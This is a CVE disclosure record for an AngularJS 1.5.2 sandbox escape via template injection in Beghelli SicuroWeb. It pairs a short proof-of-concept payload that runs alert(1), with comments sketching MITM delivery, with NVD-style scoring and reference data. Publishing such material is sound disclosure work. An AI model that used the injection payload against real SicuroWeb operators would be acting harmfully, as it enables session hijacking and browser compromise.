CVE-2026-41468

/** * PoC for CVE-2026-41468: AngularJS 1.5.2 Sandbox Escape * Context: Template Injection in Beghelli SicuroWeb * Description: This payload demonstrates how to escape the AngularJS sandbox * to execute arbitrary JavaScript code (e.g., alert(1)). */ // The payload uses known primitives to access the Function constructor // and execute code outside the sandbox restrictions. var payload = "{{" + "x={'y':''.constructor.prototype};" + // Access Object.prototype "x.y.charAt=[].join;" + // Overwrite a safe function with a generic one "$eval('x=alert(1)');" + // Use $eval to execute arbitrary JS "}}"; // In a real attack scenario via MITM: // 1. Attacker intercepts HTTP response. // 2. Attacker finds an injection point (e.g., a search box reflecting input). // 3. Attacker replaces the parameter value with the 'payload' variable. // 4. The browser parses the response, AngularJS executes 'alert(1)'. console.log("Payload to inject: " + payload);

{"cve": {"id": "CVE-2026-41468", "sourceIdentifier": "[email protected]", "published": "2026-04-22T19:17:08.813", "lastModified": "2026-04-22T21:18:45.917", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Beghelli Sicuro24 SicuroWeb embeds AngularJS 1.5.2, an end-of-life component containing known sandbox escape primitives. When combined with template injection present in the same application, these primitives allow attackers to escape the AngularJS sandbox and achieve arbitrary JavaScript execution in operator browser sessions, enabling session hijacking, DOM manipulation, and persistent browser compromise. Network-adjacent attackers can deliver the complete injection and escape chain via MITM in plaintext HTTP deployments without active user interaction."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:L/SC:H/SI:H/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "LOW", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:L", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.1, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-1104"}]}], "references": [{"url": "https://github.com/kmkz/Exploits/blob/master/2026/CVE-2026-22191-POC.py", "source": "[email protected]"}, {"url": "https://github.com/kmkz/Exploits/blob/master/2026/CVE-2026-22191-SicuroWeb-ATI-chain.txt", "source": "[email protected]"}, {"url": "https://www.beghelli.it", "source": "[email protected]"}, {"url": "https://www.boffsec-services.com/posts/sicuroweb-cve-2026-22191/", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/beghelli-sicuro24-sicuroweb-angularjs-sandbox-escape-via-template-injection", "source": "[email protected]"}]}}